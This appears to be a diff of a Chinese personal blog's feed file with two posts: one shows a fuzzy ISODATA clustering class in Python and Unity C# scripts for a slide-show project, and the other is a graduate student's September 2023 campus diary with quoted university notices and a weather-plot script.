    self.k = k <color="#57a64a"># 簇的数量</color>
    self.max_iter = max_iter <color="#57a64a"># 最大迭代次数</color>
    self.min_samples = min_samples <color="#57a64a"># 每个簇的最小样本数</color>
    <color="#57a64a"># 每个簇的最大样本数 max_samples。如果未指定,则默认为样本数据 data 的长度</color>
    self.max_samples = max_samples if max_samples is not None else len(data)
    self.epsilon = 0.01 <color="#57a64a"># 容差阈值</color>
    self.alpha = 0.5 <color="#57a64a"># 簇重心标准偏差的阈值</color>
    self.beta = 0.5 <color="#57a64a"># 样本点从属度的阈值</color>

    self.centroids = None <color="#57a64a"># 簇质心</color>
    self.weights = None <color="#57a64a"># 每个样本点在所有簇中的从属度</color>

    <color="#dcdcaa">def initialize(self)</color>:
    <color="#57a64a"># 从原始数据 self.data 中选取 k 个随机的质心点,保存到 self.centroids 变量中。</color>
    self.centroids = self.data[np.random.choice(len(self.data), self.k, replace=False), :]
    <color="#57a64a"># 初始化权重矩阵 self.weights,大小为 (len(self.data), k),其中每个元素都被初始化为 0</color>
    self.weights = np.zeros((len(self.data), self.k))
    <color="#57a64a"># 对于所有原始数据 self.data 中的向量,为它们随机分配一个初始的权重值</color>
    for i in range(len(self.data)):
    self.weights[i, np.random.randint(self.k)] = 1

    <color="#dcdcaa">def update_weights(self)</color>:
    <color="#57a64a"># 代码通过遍历所有的质心点 j,找到所有分配到第 j 个簇中的数据样本</color>
    for j in range(self.k):
    <color="#57a64a"># 如果该簇中的样本数小于预设的最小值 self.min_samples,</color>
    <color="#57a64a"># 那么就认为该簇没有足够的样本,后面就无法对它进行合并等操作,因此需要把该簇从质心和权重矩阵中删除,并把 self.k 减 1</color>
    samples = self.data[self.weights[:, j] > 0]
    if len(samples) < self.min_samples:
    mask = self.weights[:, j] == 1
    self.weights[mask, :] = np.delete(self.weights[mask, :], j, axis=1)
    self.centroids = np.delete(self.centroids, j, axis=0)
    self.k -= 1
    continue
    <color="#57a64a"># 对于有足够样本的簇,算法会根据该簇中所有样本与该簇的质心点 j 之间的距离计算出一个标准差 std_dev,</color>
    <color="#57a64a"># 并将除标准差以外的部分规范化为一个权重值,用于表示该样本属于该簇的程度</color>
    <color="#57a64a"># 首先计算所有样本到 j 号质心的欧几里得距离 dist</color>
    dist = np.linalg.norm(samples - self.centroids[j], axis=1)
    <color="#57a64a"># 求出这些距离的平均值 mean_dist 和标准差 std_dev</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 利用高斯分布函数将距离 dist 转换为一个 0~1 之间的权重值,用于表示该样本属于这个簇的程度</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))

    mask = self.weights[:, j] > 0
    <color="#57a64a"># 根据计算出来的权重更新 self.weights 矩阵中的对应位置,即将 self.weights[i, j] 赋值为上面计算出来的权重值</color>
    self.weights[mask, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#dcdcaa">def update_centroids(self)</color>:
    <color="#57a64a"># 遍历所有质心点 j,并根据每个簇的权重信息,重新计算第 j 个簇的质心坐标</color>
    for j in range(self.k):
    <color="#57a64a"># 通过对 self.weights 矩阵进行逻辑判断,</color>
    <color="#57a64a"># 筛选出所有满足 self.weights[:, j] > 0 条件的索引,即所有已经被分配到第 j 个簇的数据样本</color>
    mask = self.weights[:, j] > 0
    <color="#57a64a"># 使用 np.mean() 方法在这些样本上分别计算出每个维度上的均值,作为该簇新的质心坐标</color>
    self.centroids[j] = np.mean(self.data[mask], axis=0)

    <color="#dcdcaa">def update_k(self)</color>:
    <color="#57a64a"># 判断样本数据量是否超过了 self.max_samples,如果没有超过就直接返回,不做任何处理</color>
    if len(self.data) <= self.max_samples:
    return
    <color="#57a64a"># 样本数据量超过 self.max_samples 时,算法会计算所有质心点中每个维度的标准差,</color>
    <color="#57a64a"># 并筛选出其中标准差大于 self.epsilon 的质心点,即待进行拆分操作的质心点。</color>
    <color="#57a64a"># 这通过对 self.centroids 中每个质心点在各个维度上的标准差进行计算,</color>
    <color="#57a64a"># 并使用 np.where() 方法筛选出标准差大于 self.epsilon 的质心点来实现。</color>
    centroids_to_split = np.where(np.std(self.centroids, axis=1) > self.epsilon)[0]

    <color="#57a64a"># 对于每个待拆分的质心点 i</color>
    for i in centroids_to_split:
    <color="#57a64a"># 算法会在该质心点的位置插入一个新的质心点 i+1。</color>
    <color="#57a64a"># 具体地,代码使用新质心点的计算公式,即当前质心坐标加上一个随机扰动,生成一个新的质心坐标</color>
    new_centroid = self.centroids[i] + self.alpha * np.std(self.data, axis=0)[i] * np.random.randn(len(self.data[0]))
    <color="#57a64a"># 使用 np.insert() 方法将这个新的质心坐标插入到 self.centroids 数组中第 i+1 个位置</color>
    self.centroids = np.insert(self.centroids, i + 1, new_centroid, axis=0)

    <color="#57a64a"># 根据每个簇的权重信息,对新拆分出来的簇进行样本分配</color>
    <color="#57a64a"># 对于拆分出来的两个簇 i 和 i+1,算法会将原来被分配到第 i 个簇中的数据样本重新分配到距离它更近的质心中</color>
    mask = self.weights[:, i] > 0
    <color="#57a64a"># 对 self.weights 矩阵中被分配到第 i 个簇中的样本进行筛选</color>
    self.weights[mask, i] = self.beta
    <color="#57a64a"># 将它们的权重值从原来的 self.beta 修改为 1 - self.beta(即从属度由原来的较弱变为较强),</color>
    <color="#57a64a"># 同时将它们的权重值从第 i+1 个簇中原来的 0 修改为 1 - self.beta</color>
    self.weights[mask, i+1] = 1 - self.beta

    <color="#57a64a"># 将簇的数量 self.k 加一,表示新拆分出来的簇已经被计入簇的总数中</color>
    self.k += 1

    <color="#dcdcaa">def fit(self)</color>:
    self.initialize()

    for i in range(self.max_iter):
    self.update_weights()
    self.update_centroids()
    self.update_k()

    <color="#dcdcaa">def predict(self, data)</color>:
    <color="#57a64a"># 输入一组新的数据样本 data,算法会计算出这些样本点与所有质心点之间的距离,</color>
    <color="#57a64a"># 并对每个簇的权重进行计算。最终,算法会将所有数据样本分配到权重最大的簇中</color>
    weights = np.zeros((len(data), self.k))
    for j in range(self.k):
    <color="#57a64a"># 使用 np.linalg.norm() 方法计算 data 与第 j 个质心点的欧几里得距离</color>
    dist = np.linalg.norm(data - self.centroids[j], axis=1)
    <color="#57a64a"># 使用 np.mean() 方法计算所有样本点与该质心点之间的平均距离 mean_dist</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 计算样本点与平均距离之间的标准差 std_dev</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))
    <color="#57a64a"># 使用高斯核函数(Gaussian Kernel)计算每个样本分别属于第 j 个簇的概率</color>
    weights[:, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#57a64a"># 算法选取每个样本点分别属于哪个簇的权重值最大,即使用 argmax() 方法在 weights 矩阵的第二个轴上取最大值所在的索引</color>
    return weights.argmax(axis=1)

    <color="#FF8800">import matplotlib.pyplot as plt</color>
    <color="#FF8800">from sklearn.datasets import make_blobs</color>

    <color="#57a64a"># 生成一些随机的数据点</color>
    data, _ = make_blobs(n_samples=1000, centers=3, n_features=2, random_state=42)

    <color="#57a64a"># 使用模糊 ISODATA 算法聚类数据</color>
    fisodata = FuzzyISODATA(data, k=3, max_iter=20)
    fisodata.fit()
    labels = fisodata.predict(data)

    <color="#57a64a"># 将聚类结果可视化</color>
    plt.scatter(data[:, 0], data[:, 1], c=labels)
    plt.show()

    7

    jpg

    SynthText3D

    png

    ​布局是左边文字右边图片。配色方案:

    • 背景:#312E2B
    • 文字:
      • 绿:#92E86C
      • 红:#FF8080
      • 青:00FFFF

    ​写了个更换鼠标指针的逻辑,结果编译完没生效,寄!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    using UnityEngine;

    public class ChangeCursor : MonoBehaviour
    {
    public Texture2D cursorTexture;
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    }
    }

    png

    HierarchyProject 的放置。左边的幻灯片序号是连续的,右边则不然,右边的 GameObject 绑定了 SceneID 类以和左边绑定。

    1
    2
    3
    4
    5
    6
    using UnityEngine;

    public class SceneID : MonoBehaviour
    {
    public int ID = 0;
    }

    ​写了个 ScenesController 类用于控制翻页。

    • 按下 左/A 键向前翻页,执行 privousScene()
    • 按下 右/D 键向后翻页,执行 nextScene()
    • playAnimation() 掌管翻页动画,使用 Dotween 插件。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    using System.Collections;
    using System.Collections.Generic;
    using Unity.VisualScripting;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private Transform leftScenesParent;
    private List<Transform> leftScenes = new List<Transform>();
    [SerializeField] private Transform rightScenesParent;
    private List<Transform> rightScenes = new List<Transform>();

    private int currentRightScene = 0;
    private int oldRightScene = 0;
    private int currentLeftScene = 0;
    private int oldLeftScene = 0;
    [SerializeField] private Text sceneIndexUI;
    private bool allowChange = true;

    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < leftScenesParent.childCount; i++)
    {
    leftScenes.Add(leftScenesParent.GetChild(i));
    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
    }
    leftScenes[0].localPosition = Vector3.zero;

    for (int i = 0; i < rightScenesParent.childCount; i++)
    {
    rightScenes.Add(rightScenesParent.GetChild(i));
    rightScenes[i].localPosition = new Vector3(0, 1440, 0);
    }
    leftScenes[0].localPosition = Vector3.zero;
    rightScenes[0].localPosition = Vector3.zero;

    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;
    }

    // Update is called once per frame
    void Update()
    {
    if (Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
    privousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }

    private void privousScene()
    {
    if (allowChange)
    {
    allowChange = false;
    Debug.Log("privousScene()");
    oldLeftScene = currentLeftScene;
    if (currentLeftScene == 0)
    currentLeftScene = leftScenes.Count - 1;
    else
    currentLeftScene -= 1;
    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

    playAnimation();
    }
    }
    private void nextScene()
    {
    if (allowChange)
    {
    allowChange = false;
    Debug.Log("nextScene()");
    oldLeftScene = currentLeftScene;
    currentLeftScene = (currentLeftScene + 1) % leftScenes.Count;
    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

    playAnimation();
    }
    }
    private void playAnimation()
    {
    oldRightScene = currentRightScene;
    if (rightScenes[rightScenes.Count - 1].GetComponent<SceneID>().ID <= currentLeftScene)
    {
    currentRightScene = rightScenes.Count - 1;
    }
    else
    {
    for (int i = 0; i < rightScenes.Count - 1; i++)
    {
    if (rightScenes[i].GetComponent<SceneID>().ID <= currentLeftScene && rightScenes[i + 1].GetComponent<SceneID>().ID > currentLeftScene)
    {
    currentRightScene = i;
    }
    }
    }

    Tweener tweenerLeftOut = null;
    Tweener tweenerRightOut = null;
    if (oldLeftScene > currentLeftScene)
    {
    tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(-1440, 1);
    }
    else
    {
    tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(1440, 1);
    }
    if (oldRightScene > currentRightScene)
    {
    tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(1440, 1);
    }
    else if (oldRightScene < currentRightScene)
    {
    tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(-1440, 1);
    }

    leftScenes[currentLeftScene].gameObject.SetActive(true);
    rightScenes[currentRightScene].gameObject.SetActive(true);
    Tweener tweenerLeftIn = leftScenes[currentLeftScene].DOLocalMoveY(0, 1);
    Tweener tweenerRightIn = null;
    if (currentRightScene != oldRightScene)
    {
    tweenerRightIn = rightScenes[currentRightScene].DOLocalMoveY(0, 1);
    }
    Debug.Log("currentRightScene: " + currentRightScene + " oldRightScene: " + oldRightScene + " currentLeftScene: " + currentLeftScene + " oldLeftScene" + oldLeftScene);
    tweenerLeftIn.OnComplete(() =>
    {
    for (int i = 0; i < leftScenes.Count; i++)
    {
    if (i > currentLeftScene)
    {
    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
    leftScenes[i].gameObject.SetActive(false);
    }
    else if (i < currentLeftScene)
    {
    leftScenes[i].localPosition = new Vector3(0, 1440, 0);
    leftScenes[i].gameObject.SetActive(false);
    }
    }
    allowChange = true;
    });
    }
    }

    ​显示图片的动画代码,这个应该是弃案了。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class ShowPictures : MonoBehaviour
    {
    [SerializeField] private Transform imagesParent;
    private List<Image> images = new List<Image>();
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < imagesParent.childCount; i++)
    {
    images.Add(imagesParent.GetChild(i).GetComponent<Image>());
    images[i].color = new Color(images[i].color[0], images[i].color[1], images[i].color[2], 0);
    }
    showPictures(0);
    }

    private void showPictures(int i)
    {
    if (i < images.Count)
    {
    Tweener tweener = images[i].DOFade(1, 0.5f);
    tweener.OnComplete(()=> showPictures(i + 1));
    }

    }
    }

    ​经典的挂伟哥动画代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;
    using Unity.VisualScripting;

    public class ChangeColor : MonoBehaviour
    {
    [SerializeField] private bool isImage = true;
    private Image image;
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    if (isImage)
    {
    image = GetComponent<Image>();
    float H, S, V;
    Color.RGBToHSV(image.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    else
    {
    text = GetComponent<Text>();
    float H, S, V;
    Color.RGBToHSV(text.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    }

    private void changeColor(float H, float S, float V)
    {
    float newH = H + 0.01f;
    if (newH > 1)
    {
    newH = 0;
    }
    Tweener tweener = null;
    if (isImage)
    {
    tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    else
    {
    tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    // 将 HSV 颜色转换回 RGB 格式
    tweener.OnComplete(()=> changeColor(newH, S, V));
    }
    }

    ​本来有一个按下按钮出一个闽南语祝伟哥生日快乐的功能,结果汇报的时候不知道为啥没按出来……

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    using UnityEngine;
    using UnityEngine.UI;

    public class PlaySounds : MonoBehaviour
    {
    public AudioClip soundClip;
    private AudioSource audioSource;

    private void Start()
    {
    // 获取按钮所附加的 AudioSource 组件
    audioSource = GetComponent<AudioSource>();
    if (audioSource == null)
    {
    // 如果按钮上没有 AudioSource,则添加一个
    audioSource = gameObject.AddComponent<AudioSource>();
    }

    // 设置 AudioSource 的音频剪辑
    audioSource.clip = soundClip;

    // 确保按钮有一个按钮点击事件处理程序,并将 PlaySound() 方法添加为响应方法
    Button button = GetComponent<Button>();
    button.onClick.AddListener(PlaySound);
    }

    // 播放声音的方法
    private void PlaySound()
    {
    Debug.Log("Play Sound!");
    audioSource.Play();
    }
    }

    ]]>
    @@ -5040,7 +5040,7 @@ /posts/Diary-1-%E6%A2%A7%E6%A1%90%E4%B8%8E%E9%93%B6%E6%9D%8F/ - 前言

    ​ 研二上开始了!

    ​ 这篇博客是一篇 9.3 到冀大以后的流水账!

    ​ 这两周概括起来就是:

    最近怎么样
    天天实验室
    非常的无聊
    好好

    ​ 保定气候播报:

    import matplotlib.pyplot as plt
    import seaborn as sns
    from datetime import datetime

    # 设置 Seaborn 的样式为 darkgrid 风格
    sns.set_style("darkgrid")

    # x轴日期数据
    x = []
    for i in range(14):
    x.append(datetime(2023, 9, 4) + timedelta(days=i))

    # y 轴数据(假设为温度和 PM 值)
    y1 = [20, 22, 21, 21, 22, 20, 19, 18, 14, 15, 14, 17, 19, 19] # 当日最低温
    y2 = [32, 32, 32, 33, 31, 26, 27, 28, 26, 28, 29, 29, 30, 31] # 当日最高温
    y3 = [89, 90, 107, 91, 80, 35, 39, 50, 37, 38, 50, 59, 93, 63] # 当日 PM 值

    # 创建图表和第一个坐标轴
    fig, ax1 = plt.subplots()

    # 绘制第一个 y 轴(温度)
    ax1.plot(x, y1, label='Min Temperature', color='tab:blue')
    ax1.plot(x, y2, label='Max Temperature', color='tab:red')
    ax1.set_xlabel('Date')
    ax1.set_ylabel('Temperature (°C)')
    ax1.tick_params(axis='y')

    # 创建第二个坐标轴,并共享x轴
    ax2 = ax1.twinx()
    # 格式化 x 轴日期字符串,仅保留日
    formatted_dates = [date.strftime('%d') for date in x]

    # 设置x轴刻度和标签
    ax1.set_xticks(x)
    ax1.set_xticklabels(formatted_dates)

    # 绘制第二个 y 轴(PM 值)
    ax2.plot(x, y3, label='PM Value', color='tab:green')
    ax2.set_ylabel('PM Value')
    ax2.tick_params(axis='y')

    # 在每个数据点上添加标记
    for i, val in enumerate(y1):
    ax1.annotate(str(val) + '°C', xy=(x[i], y1[i]), textcoords='offset points', xytext=(0,10), ha='center')

    for i, val in enumerate(y2):
    ax1.annotate(str(val) + '°C', xy=(x[i], y2[i]), textcoords='offset points', xytext=(0,10), ha='center')

    for i, val in enumerate(y3):
    ax2.annotate(str(val), xy=(x[i], y3[i]), textcoords='offset points', xytext=(0,-15), ha='center')

    # 添加图例
    lines = ax1.get_lines() + ax2.get_lines()
    plt.legend(lines, [line.get_label() for line in lines], loc='lower left')

    # 添加标题
    plt.title('Temperature and PM Value')

    # 显示图表
    plt.show()

    png


    ​ 梧桐与银杏:

    jpg

    正文

    9.3

    ​ 把臭衣服臭被褥扔洗衣机后,决定去咪西一点东西。

    ​ 看微博说,冀大开了家瑞幸咖啡。

    jpg

    luckin coffee

    ​ 之前由保罗推荐,每周可以领一张 9.9 元的咖啡券,每周喝一杯也不错。


    关于规范校园电动自行车管理的通告

    ​ 为规范校园电动自行车管理,消除电动自行车安全隐患,确保师生生命财产安全和良好的校园秩序,根据相关法律法规和《冀大校园电动自行车管理暂行办法》决定自 2023 年 9 月 4 日起,对电动自行车进行规范管理,现就有关事项通告如下:

    ​ 一、电动自行车驾驶人员应严格遵守《中华人民共和国道路交通安全法》《中华人民共和国消防法》《公安部关于规范电动车停放充电加强火灾防范的通告》《河北省电动自行车管理条例》《河北省公安厅关于加强电动自行车消防安全管理的通告》等相关法律法规,安全用车,规范停车,自觉消除消防安全和交通安全隐患。

    ​ 二、校内人员电动自行车必须在辖区公安交通管理部门申请办理登记上牌手续,未办理牌照的电动自行车一律不得入校。合规电动自行车全部按照《冀大校园电动自行车管理暂行办法》要求在安全工作处登记备案,规范管理。

    ​ 三、用于警务、工程、维护维修、后勤保障等工作的电动自行车,需提前由所在单位到安全工作处办理备案手续。

    ​ 四、电动自行车驾驶人驾车入校必须佩戴安全头盔,入校后缓速行驶,并将电动自行车在指定区域有序停放。严禁乱停乱放,不得占用消防通道,不得影响正常交通。对初次违反行驶、停车管理规定的,给予批评教育并记录在案;违反 3 次以上的,采取暂扣车辆措施,并通报所在单位。

    ​ 五、电动自行车一律在指定区域充电,严禁电动自行车及电池进入宿舍、教学楼、办公楼、实验室等场所。否则一经发现将暂扣车辆,并根据相关管理规定对当事人严肃处理。

    ​ 六、在校园内违规使用电动自行车,导致安全事故或造成重大影响的,学校将配合执法部门依法依规追究当事人员的相应责任。

    ​ 七、各单位要对所属人员开展法律法规和校内规章制度的宣传教育,倡导安全文明绿色出行,引导师生员工遵规守纪,提高安全意识,同时加强巡查检查,及时发现处理违规行为,积极配合落实电动自行车管理工作措施,切实维护好自身和他人生命财产安全。

    特此通告

    安全工作处

    2023 年 8 月 31 日

    ​ 冀大要开始整治电瓶车了。还养了一堆看门狗监督学生不要把电瓶车骑到教学楼区域。大致意思就是冀大没有电瓶车充电桩,学生一般都是把电瓶车电池拆下来往楼里充电,这要不小心出事可就麻烦大了。于是机智的领导决定花钱安装电瓶车充电桩通过限制电瓶车的使用方式来让学生觉得骑电瓶车是一个困难而且麻烦的事,然后逐步放弃骑电瓶车,达到禁电瓶车的目的!真是太机智了!获得了底下学生一片骂声!

    ​ 之前要走的时候把电瓶车停在了学院楼下,现在那个位置不让停了,得把它骑回宿舍楼先😅。顺便把买的台灣特產送给同门吧。

    ​ 好在电瓶车当时没被洪水整坏,还能骑。这段时间我有点不太想骑电瓶车,打算观望一会儿,等风头过一过再开始骑。


    通  知

    ​ 本楼浴室即日起改造施工计划工期 12 天。施工期间请同学们到德新 1 号、德新 7 号北口浴室进行洗浴。
    ​ 德新 7 号北口浴室保留一卡通洗浴,德新 1 号采用“智慧笑联”平台运行,具体使用方法参看楼内张贴的使用说明。
    ​ 请同学们相互转告,给同学们带来不便,敬请谅解!

    2023 年 9 月 3 日

    ​ 冀大要开始整治澡堂了。

    ​ 据说我宿舍楼下的澡堂一直都能洗,但是我来冀大的第一天就开始装修了,歪撒女内😅。

    ​ 最后找德新 7 找了好久才找到了澡堂。

    合着我刚来学校 我宿舍浴室就装修
    那洗澡是麻烦的
    真傻逼啊
    主要是现在这样洗澡来回折腾
    跟白洗一样
    早不装修的
    偏偏开学了才来整这一处

    到学校后虽然又多了电瓶车管制和澡堂装修这俩傻逼事,但由于我对冀大的期望已经足够低,所以也没有感觉特别难受。

    ​ 因为这天大半夜就醒了去赶飞机,已经很久没睡觉了,所以也很早就睡了🥱。

    9.4

    jpg

    梧桐与银杏

    ​ 冀大著名景点——银杏大道。

    ​ 之前一直有的一个想法,每天在银杏大道的同一个视角前拍一张照片,时间久了把这些照片连起来,就能鲜明地展现出保定秋冬气候的变化😀。

    ​ 这个视角也选好了,就是银杏大道正中央一个坏掉的瓷砖前面了,希望冀大不要哪天把这个瓷砖修了😅。


    jpg

    Brann Bronzebeard
    这个电脑屏幕亮的一看就很牛逼
    6
    这么早的

    ​ 来到了实验室,因为这个实验室基本都是研三的所以人还蛮少,挺安静,好评!


    ​ 据说福建台风洪涝灾害十分严重。今年台风是蛮严重的,多而且猛。

    jpg

    厦门“湖里”
    好家伙
    火速逃离福建
    厦门被淹了
    关某跑的真巧
    差一点点就跑不掉了

    ​ 傍晚去澡堂还碰见了伟哥可还行。

    你参观伟哥洗澡了吗

    ​ 每天的大致时间线:

    • 6:00-7:00 的随机一个时刻醒来
    • 6:30-7:30 到实验室
    • 10:30-11:00 的随机一个时刻去食堂
    • 11:00 左右吃个午饭,回宿舍躺尸
    • 12:30-14:00 醒了,去实验室
    • 16:30-17:00 的随机一个时刻去食堂
    • 17:00-19:00 吃饭洗澡洗衣服躺尸一条龙
    • 19:00-19:30 去实验室
    • 21:30-22:00 回宿舍洗漱躺尸

    ​ 因为冀大的澡堂和食堂资源实在有限,所以我一般都是错峰出行避免人多,久而久之也习惯了。

    大概是太久没跟舍友在一起的缘故,感觉跟舍友之间生疏了不少,舍友们打游戏啊去聚餐啊去健身房啊也觉得没什么兴致想要加入。在这里经历了这么多事情后,在这里早已没有归属感,发完小论文马上跑路吧,有时候享受着一个人不被人打扰的感觉,有时候又感觉有些孤独。

    9.5

    jpg

    万佛寺

    ​ 厦门淹,厦门淹,厦门淹完福州淹。


    林徽因说:“其实结不结婚,都会后悔。巷子里的猫很自由,却没有归宿;围墙里的狗有归宿,却终身都要低头,人生这道选择题,怎么选都会有遗憾。

    但请你记住,无论怎么选,谋爱前先谋生,爱人前先爱己,一个人没有经济能力,才是万劫不复。”现在的你,论文和英语,是主要工作,要抓紧,其他的,自然会水到渠成。

    9.6

    jpg

    嘎嘎嘎

    ​ 打卡一下图书馆前的鸭子。


    jpg

    喜提隔间

    ​ 德新 7 的澡堂也要开始装修了,喜提白跑一趟,试了试德新 1,新澡堂有隔间,还不错!就是要用手机刷码有点麻烦。

    9.7

    @全体成员 今晚(周四)七点在 326 开会,请各位同学按时参加。

    ​ 许久没开的组会终于要开了!大致就是汇报了下大家的论文进度,除了牛伟和牛凡感觉进度都不怎样😅。杰哥说他的实验受计算资源的限制进行不下去,只得换方向。再次感叹道有些论文发不发得出还不完全是自己的原因,一些资源实在是太差了。冀大你个穷逼。

    9.8

    ​ 很想记录点什么,但好像这天都在实验室没啥可记录的。

    9.9

    ​ 保定又下雨了,天气有一点点凉,但北方的房子保暖能力实在太好,还是得短袖短裤😅。


    上午 9 点 45,在 C1-535 参加学术报告,提前 10 分钟来签到。@所有人
    报告会请假要找温老师开假条,导师签字(要评奖学金了,大家可别偷偷不来)

    ​ 又是撑场子大会。歪撒女内。

    ​ 上午还带了个枕头做个样子。下午直接翘了老子不陪冀大玩了告辞。

    9.10

    祝老师教师节快乐!
    谢谢大家!很开心!

    ​ 教师节师兄想送点东西,但是群里实在太尬没人带节奏最后啥也没送😅,想请导师吃个饭但是导师有事情就告吹了。隔壁师兄买了个大果篮结果他们导师不要给我们分了。

    9.11

    ​ 小迷糊在北京找到了新工作,恭喜小迷糊!

    9.12

    ​ 很想记录点什么,但好像这天都在实验室没啥可记录的。

    9.13

    ​ 很想记录点什么,但好像这天都在实验室没啥可记录的。

    9.14

    周四晚上七点在 326 开组会,组会内容由杰哥准备@杰哥

    ​ 又是组会了。

    ​ 我们的组会氛围比较轻快,挺好的。

    感谢我导对她的职称没什么追求让我几个大水逼赶紧水完论文跑路。不是自己的赛道,不卷了。

    9.15

    ​ ~~很想记录点什么,但好像这天都在实验室没啥可记录的。~~下午实在觉得疲乏,就躺宿舍了,然后顺便整理了下房间,整理出了一大坨😅。

    jpg

    一大坨

    ​ 澡堂总算是装修好了,终于不用去抢隔间了。

    9.16

    ​ 又是调代码的一天,还调上头了午休都不去了。

    ​ 识图复现一篇 CCFA 的论文,复现复现着总觉得原作者有点学术造假😅,把原始数据扔丹炉里直接把丹炉搞炸了,洗数据洗了老半天,勉强能跑,但是效果根本不会有它吹牛逼得那么好。

    前几天导师还在组会上感慨,计算机学生一心写代码,论文写作得乱七八糟。这个论文写作的牛逼哄哄,数据集给得乱七八糟。就觉得计算机学术圈真是乌烟瘴气的,反正都是形式主义,一点卵用没有,国家花那么多钱培养一堆垃圾。人家北大这么搞能出俩 CCFA,我冀大水一个 CCFC,不是问题!

    9.17

    ​ 大半夜又热得睡不着,同样的气温下,保定要比福州体感热很多。于是下午又摆了。

    ]]>
    + 前言

    ​ 研二上开始了!

    ​ 这篇博客是一篇 9.3 到冀大以后的流水账!

    ​ 这两周概括起来就是:

    最近怎么样
    天天实验室
    非常的无聊
    好好

    ​ 保定气候播报:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    import matplotlib.pyplot as plt
    import seaborn as sns
    from datetime import datetime

    # 设置 Seaborn 的样式为 darkgrid 风格
    sns.set_style("darkgrid")

    # x轴日期数据
    x = []
    for i in range(14):
    x.append(datetime(2023, 9, 4) + timedelta(days=i))

    # y 轴数据(假设为温度和 PM 值)
    y1 = [20, 22, 21, 21, 22, 20, 19, 18, 14, 15, 14, 17, 19, 19] # 当日最低温
    y2 = [32, 32, 32, 33, 31, 26, 27, 28, 26, 28, 29, 29, 30, 31] # 当日最高温
    y3 = [89, 90, 107, 91, 80, 35, 39, 50, 37, 38, 50, 59, 93, 63] # 当日 PM 值

    # 创建图表和第一个坐标轴
    fig, ax1 = plt.subplots()

    # 绘制第一个 y 轴(温度)
    ax1.plot(x, y1, label='Min Temperature', color='tab:blue')
    ax1.plot(x, y2, label='Max Temperature', color='tab:red')
    ax1.set_xlabel('Date')
    ax1.set_ylabel('Temperature (°C)')
    ax1.tick_params(axis='y')

    # 创建第二个坐标轴,并共享x轴
    ax2 = ax1.twinx()
    # 格式化 x 轴日期字符串,仅保留日
    formatted_dates = [date.strftime('%d') for date in x]

    # 设置x轴刻度和标签
    ax1.set_xticks(x)
    ax1.set_xticklabels(formatted_dates)

    # 绘制第二个 y 轴(PM 值)
    ax2.plot(x, y3, label='PM Value', color='tab:green')
    ax2.set_ylabel('PM Value')
    ax2.tick_params(axis='y')

    # 在每个数据点上添加标记
    for i, val in enumerate(y1):
